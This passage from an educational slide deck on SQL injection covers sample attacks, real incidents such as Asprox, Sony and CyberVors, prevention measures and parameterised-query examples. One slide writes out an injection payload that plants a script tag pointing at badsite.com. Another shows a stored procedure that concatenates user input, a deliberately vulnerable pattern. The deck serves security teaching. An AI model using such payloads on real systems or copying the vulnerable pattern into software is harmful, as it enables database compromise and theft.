  • 7. HTML Tags  SELECT FIRST_NAME, LAST_NAME FROM CUSTOMER WHERE USERNAME = ‘’; UPDATE TABLE CUSTOMER SET MIDDLE_NAME = ‘<script src=http://badsite.com>’; --’
  • 8. Stored Procedures CREATE PROCEDURE getOrdersByCustomerID @custId nvarchar[50] AS EXECUTE(“SELECT OrderID FROM Sales WHERE CustomerID = ‘” + custId + “’”);
  • 9. Difficulties  Obvious attacks  Structure deletion  Denial of Service  Increase load on the system  Covert attacks  Changes to data  Changes to code
  • 10. Real World: Asprox  Executable installed via phishing emails or through the network  Searches Google for vulnerable ASP sites  Downloads compromising Javascript from direct84.com  Attempts to download additional, harmful Javascript, Asprox copies, Trojan Danmec, and/or SQL attack tool
  • 11. Real World: Sony  Hacked by LulzSec  Attack on several of Sony’s ventures such as SonyPictures.com and music division servers  LulzSec claimed attack resulted from a single statement  Purportedly injection may have been involved with PSN attack
  • 12. Real World: Sun & MySQL  TinKode and Ne0h compromised specific Sun domains  Obtained column names and email addresses in a table  MySQL.com  Exposed metadata, account names, and passwords (both admin and blog)  Issue with Web coding, not database
  • 13. Real World: CyberVors  Russian cyber criminal group  Compromised 400,000+ servers and sites  Approx 1.2 billion usernames and passwords stolen  Indiscriminant targeting of companies  Utilized different hacking methods and several individuals and groups over several years
  • 14. Preventative Measures  Blacklisted Words or characters  Not recommended  Utilizing SQL Parameters  Validation Controls and field classification  Disallow error messages from revealing database metadata  Johnny’s Google Hacking Database  Johnny.ihackstuff.com/ghdb
  • 15. Validation Samples if(UserID.contains(“’”)); { <redirect to an error page> } else { <perform query action hear> }
  • 16. Validation Samples try { <convert input to value of specified type> } catch { <redirect to error page> }
  • 17. Validation Samples string ID; database.querytext = “SELECT ID FROM TABLENAME WHERE USERID = ?”; database.addParameter(ID); database.executeQuery();
  • 18. Follow up Questions What tools or techniques can be used to determine vulnerabilities within a system for SQLi?  Have you had to reassess code to prevent SQLi vulnerabilities? If so, please elaborate. What are some other modern cases involving SQLi?
  • 19. References & Readings  Arthur, C. (2014). LulzSec hacker arrested over Sony attack. Retrieved from http://www.theguardian.com/technology/2012/a ug/29/lulzsec-hacker-arrest-sony-attack  Databases vulnerable to SQL injections. (2008). Data Strategy, 3(12), 6.  Dorai, R., & Kannan, V. (2011). SQL Injection- Database Attack Revolution and Prevention. Journal Of International Commercial Law & Technology, 6(4), 224-231.  International Business, T. (0006, July). Post-PSN hack: Sony apologise at E3 as LulzSec mount fresh attack. International Business Times.
  • 20.  Kirk, J. (2013). Asprox botnet proves to be a resilient foe. Cio (13284045), 8.  Lemos, R. (2014). Russian Cyber-Gang Gathers 1.2B Login Credentials Via Website Flaws. Eweek, 7.  OWASP. (2014). SQL Injection. Retrieved from https://www.owasp.org/index.php/SQL_Injection  Prince, B. (2008). Botnet installs SQL injection tool. Eweek, 25(16), 21.  Sullivan, B. & Liu, Vincent. (2012). Web Application Security: A Beginner’s Guide. New York, NY: McGraw-Hill Companies.  Sun.com, MySQL.com Hacked, SQL Injection Attack. (2011). Channel Insider, 1.  W3Schools . (2014). SQL injection. Retrieved from http://www.w3schools.com/sql/sql_injection.asp

Editor's Notes

  1. Can include sql or html modifications
  2. May 2011
  3. Controls at application or web level